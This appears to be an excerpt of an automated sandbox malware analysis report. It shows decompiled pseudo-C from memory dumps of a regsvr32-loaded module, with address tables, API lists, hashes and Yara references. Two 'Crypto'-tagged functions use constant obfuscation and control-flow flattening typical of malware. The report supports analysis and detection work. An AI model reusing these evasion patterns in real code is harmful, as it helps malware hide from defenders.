Instruction Fuzzy Hash: AE0212B15083809FD364CF65C889A9FBBE1FBC4358F108A1DE2DA96260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10008B90, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10008B90(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				void* _t41;
				void* _t66;
				struct tagRECT* _t82;
				void* _t84;
				void* _t85;
				signed int _t86;

				_t37 =  *0x10057a08; // 0x3643b451
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E1000C473(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E10013247(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x188));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E1001329B(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E100167D5(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

0x10008b99
0x10008ba0
0x10008ba3
0x10008bb3
0x10008bb9
0x10008bbb
0x10008c94
0x10008bc1
0x10008bc7
0x10008bcb
0x10008bd3
0x10008bd5
0x10008be6
0x10008bd7
0x10008bd7
0x10008bd7
0x10008c01
0x10008c0f
0x10008c1a
0x10008c1d
0x10008c2b
0x10008c3d
0x10008c42
0x10008c51
0x10008c56
0x10008c65
0x10008c72
0x10008c7e
0x10008c87
0x10008c87
0x10008ca6

APIs

IsIconic.USER32 ref: 10008BB3

Part of subcall function 10013247: __EH_prolog3.LIBCMT ref: 1001324E
Part of subcall function 10013247: BeginPaint.USER32(?,?,00000004,1000C48A,?,00000058,10008C99), ref: 1001327A

SendMessageA.USER32 ref: 10008C01
GetSystemMetrics.USER32 ref: 10008C09
GetSystemMetrics.USER32 ref: 10008C14
GetClientRect.USER32 ref: 10008C2B
DrawIcon.USER32 ref: 10008C7E

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction ID: 92cad86a1f48a06ffd889b7e25b84ff06398f92b7342aaec6ad7b9fd969ef154
Opcode Fuzzy Hash: 34b2481c73848cf5a5b65619b116645cb85ce5e5c475ca315779ed2509392efd
Instruction Fuzzy Hash: BB31F975A00119DFEB24CFA8C995F9EBBB4FF48240F108299E549E7285DE30AA44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 040D77A3, Relevance: 9.1, Strings: 7, Instructions: 330
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040D77A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t314;
				signed int _t352;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t370;
				signed int* _t401;
				signed int* _t405;
				void* _t407;

				_t402 = _a12;
				_push(_a12);
				_push(_a8);
				_t401 = __ecx;
				_push(_a4);
				_push(__ecx);
				E040EFE29(_t314);
				_v100 = 0xaefbe1;
				_t405 =  &(( &_v192)[5]);
				_v100 = _v100 + 0x6b82;
				_t370 = 0xc5526f;
				_t362 = 0x2b;
				_v100 = _v100 / _t362;
				_v100 = _v100 ^ 0x00041443;
				_v80 = 0x1d3414;
				_v80 = _v80 + 0xffffdb02;
				_v80 = _v80 ^ 0x0011ba60;
				_v72 = 0x54a5f8;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x000d0ae3;
				_v136 = 0x274773;
				_t26 =  &_v136; // 0x274773
				_t363 = 0x1a;
				_v136 =  *_t26 * 0x4d;
				_v136 = _v136 + 0xffff9993;
				_v136 = _v136 ^ 0x0bd1637a;
				_v88 = 0xd58b4c;
				_v88 = _v88 + 0xffff1506;
				_v88 = _v88 ^ 0x00d01948;
				_v92 = 0x5e6930;
				_t38 =  &_v92; // 0x5e6930
				_v92 =  *_t38;
				_v92 = _v92 ^ 0x00540f59;
				_v116 = 0x40a51;
				_v116 = _v116 | 0x5ce3fa4e;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x1737f89e;
				_v108 = 0x7d5bec;
				_v108 = _v108 | 0x0f0c5889;
				_v108 = _v108 + 0xbcf5;
				_v108 = _v108 ^ 0x0f7d2458;
				_v164 = 0x3d5dd8;
				_v164 = _v164 ^ 0x644c870b;
				_v164 = _v164 >> 0xd;
				_v164 = _v164 * 0x7a;
				_v164 = _v164 ^ 0x017eec74;
				_v180 = 0x53df1b;
				_v180 = _v180 / _t363;
				_v180 = _v180 + 0xffff91ff;
				_v180 = _v180 + 0xffff90b6;
				_v180 = _v180 ^ 0x000d2df2;
				_v76 = 0x6cb33c;
				_v76 = _v76 + 0x7c19;
				_v76 = _v76 ^ 0x0065748e;
				_v160 = 0xaee8e0;
				_t364 = 0x3e;
				_v160 = _v160 / _t364;
				_v160 = _v160 + 0x21f3;
				_v160 = _v160 * 0x52;
				_v160 = _v160 ^ 0x00ffda9d;
				_v84 = 0xdaab99;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x000be4ff;
				_v144 = 0x6cc9e4;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0xa5290d0e;
				_v144 = _v144 ^ 0xa52e4d3d;
				_v120 = 0x3bbeb9;
				_v120 = _v120 ^ 0x393aef05;
				_v120 = _v120 + 0x22c7;
				_v120 = _v120 ^ 0x39070acc;
				_v148 = 0xc13163;
				_v148 = _v148 ^ 0x61e09c7e;
				_v148 = _v148 + 0x1cd6;
				_v148 = _v148 ^ 0x612c2d34;
				_v128 = 0x26c56f;
				_v128 = _v128 >> 2;
				_v128 = _v128 | 0xf6250b40;
				_v128 = _v128 ^ 0xf621b77e;
				_v176 = 0xf92ffc;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0x602a8fe3;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x00d9f38d;
				_v124 = 0x433c84;
				_v124 = _v124 + 0xffff4128;
				_v124 = _v124 ^ 0x1ed7562a;
				_v124 = _v124 ^ 0x1e92a094;
				_v132 = 0x6b8ec6;
				_v132 = _v132 ^ 0x28d18ae0;
				_t365 = 0x6a;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 ^ 0x9158c057;
				_v104 = 0x1fefeb;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 + 0xffff5efe;
				_v104 = _v104 ^ 0xfff4cbde;
				_v168 = 0xc1bc7b;
				_v168 = _v168 >> 3;
				_v168 = _v168 << 7;
				_v168 = _v168 * 0x7d;
				_v168 = _v168 ^ 0xe998ae80;
				_v64 = 0x9d5223;
				_v64 = _v64 | 0x29ada36c;
				_v64 = _v64 ^ 0x29b66376;
				_v184 = 0x42d2c5;
				_v184 = _v184 + 0xffffd8f9;
				_v184 = _v184 | 0x10a03a14;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xe2b073c1;
				_v192 = 0xa502eb;
				_v192 = _v192 ^ 0xb81d0436;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 / _t365;
				_v192 = _v192 ^ 0x000463de;
				_v172 = 0x9c405d;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x75940441;
				_v172 = _v172 + 0xd268;
				_v172 = _v172 ^ 0x759b0547;
				_v156 = 0x9f3fdd;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 9;
				_v156 = _v156 >> 0xd;
				_v156 = _v156 ^ 0x000ada21;
				_v188 = 0xfbaf85;
				_v188 = _v188 | 0xf8737d3a;
				_t366 = 0x3c;
				_v188 = _v188 / _t366;
				_v188 = _v188 ^ 0x0422aead;
				_v112 = 0x7705bd;
				_v112 = _v112 | 0xb4ba0e14;
				_v112 = _v112 * 0x43;
				_v112 = _v112 ^ 0x5ec93514;
				_v96 = 0xe3e42a;
				_v96 = _v96 ^ 0x25c7ee45;
				_v96 = _v96 ^ 0x252c54ca;
				_v68 = 0xae646d;
				_v68 = _v68 + 0xcc0;
				_v68 = _v68 ^ 0x00a4113a;
				_v140 = 0x4c7529;
				_t367 = 0x73;
				_v140 = _v140 / _t367;
				_v140 = _v140 | 0x6ffaa740;
				_v140 = _v140 ^ 0x6ff9ac12;
				_v152 = 0xafca7f;
				_v152 = _v152 + 0xfffffd29;
				_v152 = _v152 + 0xad57;
				_v152 = _v152 + 0x26e2;
				_v152 = _v152 ^ 0x00ba4152;
				goto L1;
				do {
					while(1) {
						L1:
						_t407 = _t370 - 0x696b508;
						if(_t407 > 0) {
							break;
						}
						if(_t407 == 0) {
							_t401[1] = E040DF369(_t402);
							_t370 = 0x4c1a8a5;
							continue;
						} else {
							if(_t370 == 0xc5526f) {
								_t370 = 0x696b508;
								 *_t401 =  *_t401 & 0x00000000;
								_t401[1] = _v100;
								continue;
							} else {
								if(_t370 == 0x1aa419f) {
									E040E0A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
									_t405 =  &(_t405[4]);
									_t370 = 0x68c33a9;
									continue;
								} else {
									if(_t370 == 0x4c1a8a5) {
										_push(_t370);
										_push(_t370);
										_t352 = E040DC5D8(_t401[1]);
										_t405 =  &(_t405[3]);
										 *_t401 = _t352;
										__eflags = _t352;
										if(__eflags != 0) {
											_t370 = 0x8344534;
											continue;
										}
									} else {
										if(_t370 == 0x642ef10) {
											E040ECAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
											_t405 =  &(_t405[3]);
											_t370 = 0x7d262d1;
											continue;
										} else {
											if(_t370 != 0x68c33a9) {
												goto L25;
											} else {
												E040E0A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
												_t405 =  &(_t405[4]);
												_t370 = 0x6a3d126;
												continue;
											}
										}
									}
								}
							}
						}
						goto L26;
					}
					__eflags = _t370 - 0x6a3d126;
					if(__eflags == 0) {
						E040ECAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
						_t405 =  &(_t405[3]);
						_t370 = 0x2431b15;
						goto L25;
					} else {
						__eflags = _t370 - 0x7d262d1;
						if(_t370 == 0x7d262d1) {
							E040E0A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
							_t405 =  &(_t405[4]);
							_t370 = 0xabb5672;
							goto L1;
						} else {
							__eflags = _t370 - 0x8344534;
							if(_t370 == 0x8344534) {
								E040D22A6(_t401, _v92,  &_v60, _v116);
								_t405 =  &(_t405[2]);
								_t370 = 0x642ef10;
								goto L1;
							} else {
								__eflags = _t370 - 0x94f1f5a;
								if(_t370 == 0x94f1f5a) {
									E040E0A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
									_t405 =  &(_t405[4]);
									_t370 = 0x1aa419f;
									goto L1;
								} else {
									__eflags = _t370 - 0xabb5672;
									if(_t370 != 0xabb5672) {
										goto L25;
									} else {
										E040E0A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
										_t405 =  &(_t405[4]);
										_t370 = 0x94f1f5a;
										goto L1;
									}
								}
							}
						}
					}
					break;
					L25:
					__eflags = _t370 - 0x2431b15;
				} while (__eflags != 0);
				L26:
				__eflags =  *_t401;
				_t313 =  *_t401 != 0;
				__eflags = _t313;
				return 0 | _t313;
			}

0x040d77ac
0x040d77b4
0x040d77b5
0x040d77bc
0x040d77be
0x040d77c6
0x040d77c7
0x040d77cc
0x040d77d7
0x040d77da
0x040d77e8
0x040d77ef
0x040d77f4
0x040d77fa
0x040d7802
0x040d780d
0x040d7818
0x040d7823
0x040d782e
0x040d7836
0x040d7841
0x040d7849
0x040d784e
0x040d7851
0x040d7855
0x040d785d
0x040d7865
0x040d786d
0x040d7875
0x040d787d
0x040d7885
0x040d7889
0x040d788d
0x040d7895
0x040d789d
0x040d78a5
0x040d78aa
0x040d78b2
0x040d78ba
0x040d78c2
0x040d78ca
0x040d78d2
0x040d78da
0x040d78e2
0x040d78ec
0x040d78f0
0x040d78f8
0x040d7908
0x040d790c
0x040d7914
0x040d791c
0x040d7924
0x040d792f
0x040d793a
0x040d7945
0x040d7951
0x040d7954
0x040d7958
0x040d7965
0x040d7969
0x040d7971
0x040d7979
0x040d797e
0x040d7988
0x040d7990
0x040d7995
0x040d799d
0x040d79a5
0x040d79ad
0x040d79b5
0x040d79bd
0x040d79c5
0x040d79cd
0x040d79d5
0x040d79dd
0x040d79e5
0x040d79ed
0x040d79f2
0x040d79fa
0x040d7a02
0x040d7a0a
0x040d7a0f
0x040d7a17
0x040d7a1c
0x040d7a24
0x040d7a2c
0x040d7a34
0x040d7a3c
0x040d7a44
0x040d7a4c
0x040d7a5b
0x040d7a5e
0x040d7a62
0x040d7a6a
0x040d7a72
0x040d7a77
0x040d7a7f
0x040d7a87
0x040d7a8f
0x040d7a94
0x040d7a9e
0x040d7aa2
0x040d7aaa
0x040d7ab5
0x040d7ac0
0x040d7acb
0x040d7ad3
0x040d7adb
0x040d7ae3
0x040d7ae8
0x040d7af0
0x040d7af8
0x040d7b00
0x040d7b0d
0x040d7b11
0x040d7b19
0x040d7b21
0x040d7b26
0x040d7b2e
0x040d7b36
0x040d7b3e
0x040d7b46
0x040d7b4b
0x040d7b50
0x040d7b55
0x040d7b5d
0x040d7b65
0x040d7b71
0x040d7b74
0x040d7b78
0x040d7b80
0x040d7b88
0x040d7b95
0x040d7b9b
0x040d7ba8
0x040d7bb0
0x040d7bb8
0x040d7bc0
0x040d7bcb
0x040d7bd6
0x040d7be1
0x040d7bef
0x040d7bf7
0x040d7bfb
0x040d7c03
0x040d7c0b
0x040d7c13
0x040d7c1b
0x040d7c23
0x040d7c2b
0x040d7c2b
0x040d7c33
0x040d7c33
0x040d7c33
0x040d7c33
0x040d7c35
0x00000000
0x00000000
0x040d7c3b
0x040d7d45
0x040d7d48
0x00000000
0x040d7c41
0x040d7c47
0x040d7d31
0x040d7d33
0x040d7d36
0x00000000
0x040d7c4d
0x040d7c53
0x040d7d1b
0x040d7d20
0x040d7d23
0x00000000
0x040d7c59
0x040d7c5f
0x040d7cdf
0x040d7ce0
0x040d7ce4
0x040d7ce9
0x040d7cec
0x040d7cee
0x040d7cf0
0x040d7cf6
0x00000000
0x040d7cf6
0x040d7c61
0x040d7c67
0x040d7cb7
0x040d7cbc
0x040d7cbf
0x00000000
0x040d7c69
0x040d7c6f
0x00000000
0x040d7c75
0x040d7c90
0x040d7c95
0x040d7c98
0x00000000
0x040d7c98
0x040d7c6f
0x040d7c67
0x040d7c5f
0x040d7c53
0x040d7c47
0x00000000
0x040d7c3b
0x040d7d52
0x040d7d58
0x040d7e4e
0x040d7e53
0x040d7e56
0x00000000
0x040d7d5e
0x040d7d5e
0x040d7d64
0x040d7e21
0x040d7e26
0x040d7e29
0x00000000
0x040d7d6a
0x040d7d6a
0x040d7d6c
0x040d7dee
0x040d7df3
0x040d7df6
0x00000000
0x040d7d6e
0x040d7d6e
0x040d7d74
0x040d7dca
0x040d7dcf
0x040d7dd2
0x00000000
0x040d7d76
0x040d7d76
0x040d7d7c
0x00000000
0x040d7d82
0x040d7d9d
0x040d7da2
0x040d7da5
0x00000000
0x040d7da5
0x040d7d7c
0x040d7d74
0x040d7d6c
0x040d7d64
0x00000000
0x040d7e5b
0x040d7e5b
0x040d7e5b
0x040d7e67
0x040d7e69
0x040d7e6e
0x040d7e6e
0x040d7e78

Strings

&, xrefs: 040D7C23
[}, xrefs: 040D78B2
sG', xrefs: 040D7849
)uL, xrefs: 040D7BE1
*, xrefs: 040D7BA8
4-,a, xrefs: 040D79DD
0i^, xrefs: 040D7885

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )uL$*$0i^$4-,a$sG'$&$[}
API String ID: 0-4036371101
Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction ID: ea7ed34fd725e6bed01d66a28e58347fd1c024c629f50eed25de20d346787939
Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction Fuzzy Hash: EEF120B15083849FD3A8CF21C489A6FFBF1FB94348F50891DE69A96220D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040D6B7A, Relevance: 9.0, Strings: 7, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E040D6B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t242;
				void* _t265;
				void* _t269;
				signed int _t271;
				signed int _t272;
				char* _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr* _t285;
				void* _t287;
				signed int _t292;
				intOrPtr _t298;
				intOrPtr _t324;
				intOrPtr* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				void* _t336;
				void* _t337;

				_t285 = _a8;
				_push(_t285);
				_push(_a4);
				_t326 = __edx;
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t242);
				_v100 = 0x757930;
				_t337 = _t336 + 0x10;
				_v96 = 0xd80ad;
				_t324 = 0;
				_v92 = 0x3caa7;
				_v88 = 0;
				_t287 = 0x43d278a;
				_v140 = 0xa476d3;
				_v140 = _v140 + 0x8b71;
				_v140 = _v140 ^ 0x00a50244;
				_v192 = 0x86f1c9;
				_v192 = _v192 | 0xd7b81b76;
				_t327 = 0x1d;
				_v192 = _v192 / _t327;
				_v192 = _v192 + 0xffff13d4;
				_v192 = _v192 ^ 0x076f980a;
				_v188 = 0x843aad;
				_v188 = _v188 << 0x10;
				_v188 = _v188 | 0xc1fad14f;
				_t328 = 0x74;
				_v188 = _v188 * 0x5b;
				_v188 = _v188 ^ 0x93eb17e1;
				_v168 = 0x8317bb;
				_v168 = _v168 ^ 0x1362ec48;
				_v168 = _v168 ^ 0x4008a55c;
				_v168 = _v168 ^ 0x53e7b525;
				_v144 = 0x20a76b;
				_v144 = _v144 / _t328;
				_v144 = _v144 ^ 0x000a47fb;
				_v196 = 0xe0aa92;
				_v196 = _v196 ^ 0x05a4f46c;
				_t329 = 0x24;
				_v196 = _v196 / _t329;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0x257ea781;
				_v200 = 0xe588c5;
				_t330 = 0x29;
				_v200 = _v200 / _t330;
				_v200 = _v200 >> 6;
				_v200 = _v200 >> 0x10;
				_v200 = _v200 ^ 0x000d5940;
				_v164 = 0x4155a9;
				_v164 = _v164 >> 5;
				_v164 = _v164 | 0x5ba52662;
				_v164 = _v164 ^ 0x5ba55520;
				_v160 = 0x4466c5;
				_v160 = _v160 >> 9;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x000d6457;
				_v148 = 0x35624e;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 ^ 0x000abf08;
				_v172 = 0x5696ab;
				_v172 = _v172 + 0xe488;
				_v172 = _v172 + 0x10cb;
				_v172 = _v172 ^ 0x0055d7ec;
				_v128 = 0xad635c;
				_v128 = _v128 ^ 0xb55b0f96;
				_v128 = _v128 ^ 0xb5f22a9b;
				_v208 = 0x275835;
				_t108 =  &_v208; // 0x275835
				_t331 = 0x37;
				_v208 =  *_t108 / _t331;
				_v208 = _v208 ^ 0xb04b577b;
				_t332 = 0x21;
				_v208 = _v208 / _t332;
				_v208 = _v208 ^ 0x055d5c1c;
				_v132 = 0x1cc441;
				_t333 = 0x6a;
				_v132 = _v132 / _t333;
				_v132 = _v132 ^ 0x000e83d7;
				_v204 = 0x125b67;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0xe127959b;
				_v204 = _v204 << 0x10;
				_v204 = _v204 ^ 0x07419ea5;
				_v180 = 0x68abbe;
				_v180 = _v180 | 0x57b8f8fa;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0x7df5736a;
				_v156 = 0x6240f4;
				_v156 = _v156 + 0xffffe0b8;
				_t334 = 0x69;
				_v156 = _v156 * 0x13;
				_v156 = _v156 ^ 0x0741ad16;
				_v124 = 0xa95440;
				_v124 = _v124 / _t334;
				_v124 = _v124 ^ 0x00021dd5;
				_v176 = 0x6e61ec;
				_v176 = _v176 + 0x7ec3;
				_v176 = _v176 | 0x8e41022f;
				_v176 = _v176 ^ 0x8e60c50b;
				_v120 = 0x9285fa;
				_v120 = _v120 ^ 0x677ff2d5;
				_v120 = _v120 ^ 0x67e9a1bb;
				_v152 = 0x5286f5;
				_v152 = _v152 + 0xffff3b7a;
				_v152 = _v152 ^ 0x016928ba;
				_v152 = _v152 ^ 0x013cf174;
				_v184 = 0xd65a61;
				_v184 = _v184 * 0x45;
				_v184 = _v184 + 0xffff6116;
				_v184 = _v184 ^ 0x39cc51e9;
				_v136 = 0xa284b3;
				_v136 = _v136 + 0x4b38;
				_v136 = _v136 ^ 0x00a4fd93;
				while(_t287 != 0x1b81945) {
					if(_t287 == 0x314f545) {
						_t265 = E040F46BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
						_t337 = _t337 + 0x10;
						if(_t265 == 0) {
							L25:
							return _t324;
						}
						_t287 = 0x958f9d6;
						continue;
					}
					if(_t287 == 0x43d278a) {
						_t287 = 0xee3ea02;
						continue;
					}
					if(_t287 == 0x55d8418) {
						_t292 = _v172;
						_t269 = E040F07AA(_t292, _v128,  &_v84, _v208,  &_v76);
						_t337 = _t337 + 0xc;
						if(_t269 != 0) {
							_push(_t292);
							_push(_t292);
							_t282 = E040DC5D8(_v80);
							_t337 = _t337 + 0xc;
							 *_t326 = _t282;
							if(_t282 != 0) {
								E040EC9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
								_t337 = _t337 + 0x10;
								 *((intOrPtr*)(_t326 + 4)) = _v80;
								_t324 = 1;
							}
						}
						_t287 = 0x1b81945;
						continue;
					}
					if(_t287 == 0x958f9d6) {
						_t271 = E040DC473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
						_t337 = _t337 + 0x10;
						asm("sbb ecx, ecx");
						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
						continue;
					}
					if(_t287 != 0xee3ea02) {
						L24:
						if(_t287 != 0x1eefa0b) {
							continue;
						}
						goto L25;
					}
					_t272 =  *((intOrPtr*)(_t285 + 4));
					_t298 =  *_t285;
					_v112 = _t272;
					_v116 = _t298;
					_t274 = _t272 - 1 + _t298;
					while(_t274 > _t298) {
						if( *_t274 == 0) {
							break;
						}
						_t274 = _t274 - 1;
					}
					_t275 = _t274 - _t298;
					_v112 = _t275;
					if(_t275 == 0) {
						L14:
						_t287 = 0x314f545;
						continue;
					}
					while(_v112 % _v192 != _v140) {
						_t207 =  &_v112;
						 *_t207 = _v112 - 1;
						if( *_t207 != 0) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
				E040F2B09(_v152, _v108, _v184, _v136);
				_t287 = 0x1eefa0b;
				goto L24;
			}

0x040d6b81
0x040d6b8b
0x040d6b8c
0x040d6b93
0x040d6b95
0x040d6b96
0x040d6b97
0x040d6b9c
0x040d6ba7
0x040d6baa
0x040d6bb5
0x040d6bb7
0x040d6bc4
0x040d6bcb
0x040d6bd0
0x040d6bd8
0x040d6be0
0x040d6be8
0x040d6bf0
0x040d6bfe
0x040d6c03
0x040d6c09
0x040d6c11
0x040d6c19
0x040d6c21
0x040d6c26
0x040d6c33
0x040d6c36
0x040d6c3a
0x040d6c42
0x040d6c4a
0x040d6c52
0x040d6c5a
0x040d6c62
0x040d6c72
0x040d6c76
0x040d6c7e
0x040d6c86
0x040d6c92
0x040d6c97
0x040d6c9d
0x040d6ca2
0x040d6caa
0x040d6cb6
0x040d6cb9
0x040d6cbd
0x040d6cc2
0x040d6cc7
0x040d6ccf
0x040d6cd7
0x040d6cdc
0x040d6ce4
0x040d6cec
0x040d6cf4
0x040d6cf9
0x040d6cfe
0x040d6d06
0x040d6d0e
0x040d6d13
0x040d6d1b
0x040d6d23
0x040d6d2d
0x040d6d35
0x040d6d3d
0x040d6d45
0x040d6d4d
0x040d6d55
0x040d6d5d
0x040d6d63
0x040d6d68
0x040d6d6e
0x040d6d7a
0x040d6d7f
0x040d6d85
0x040d6d8d
0x040d6d99
0x040d6d9e
0x040d6da4
0x040d6dac
0x040d6db4
0x040d6db9
0x040d6dc1
0x040d6dc6
0x040d6dce
0x040d6dd6
0x040d6dde
0x040d6de3
0x040d6deb
0x040d6df3
0x040d6e00
0x040d6e01
0x040d6e05
0x040d6e0d
0x040d6e20
0x040d6e24
0x040d6e2c
0x040d6e34
0x040d6e3c
0x040d6e44
0x040d6e4c
0x040d6e54
0x040d6e5c
0x040d6e64
0x040d6e6c
0x040d6e74
0x040d6e7c
0x040d6e84
0x040d6e91
0x040d6e95
0x040d6e9d
0x040d6ea5
0x040d6ead
0x040d6eb5
0x040d6ebd
0x040d6ecb
0x040d702a
0x040d702f
0x040d7034
0x040d706b
0x040d7077
0x040d7077
0x040d7036
0x00000000
0x040d7036
0x040d6ed7
0x040d7004
0x00000000
0x040d7004
0x040d6ee3
0x040d6f94
0x040d6f99
0x040d6f9e
0x040d6fa3
0x040d6fb5
0x040d6fb6
0x040d6fbe
0x040d6fc3
0x040d6fc6
0x040d6fca
0x040d6fe8
0x040d6ff6
0x040d6ff9
0x040d6ffc
0x040d6ffc
0x040d6fca
0x040d6ffd
0x00000000
0x040d6ffd
0x040d6eef
0x040d6f62
0x040d6f67
0x040d6f6e
0x040d6f76
0x00000000
0x040d6f76
0x040d6ef7
0x040d705f
0x040d7065
0x00000000
0x00000000
0x00000000
0x040d7065
0x040d6efd
0x040d6f00
0x040d6f02
0x040d6f07
0x040d6f0b
0x040d6f15
0x040d6f12
0x00000000
0x00000000
0x040d6f14
0x040d6f14
0x040d6f19
0x040d6f1b
0x040d6f1f
0x040d6f39
0x040d6f39
0x00000000
0x040d6f39
0x040d6f21
0x040d6f33
0x040d6f33
0x040d6f37
0x00000000
0x00000000
0x00000000
0x040d6f37
0x00000000
0x040d6f21
0x040d7053
0x040d705a
0x00000000

Strings

@Y, xrefs: 040D6CC7
an, xrefs: 040D6E2C
Wd, xrefs: 040D6CFE
5X', xrefs: 040D6D5D
0yu, xrefs: 040D6B9C
Nb5, xrefs: 040D6D06
8K, xrefs: 040D6EAD

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
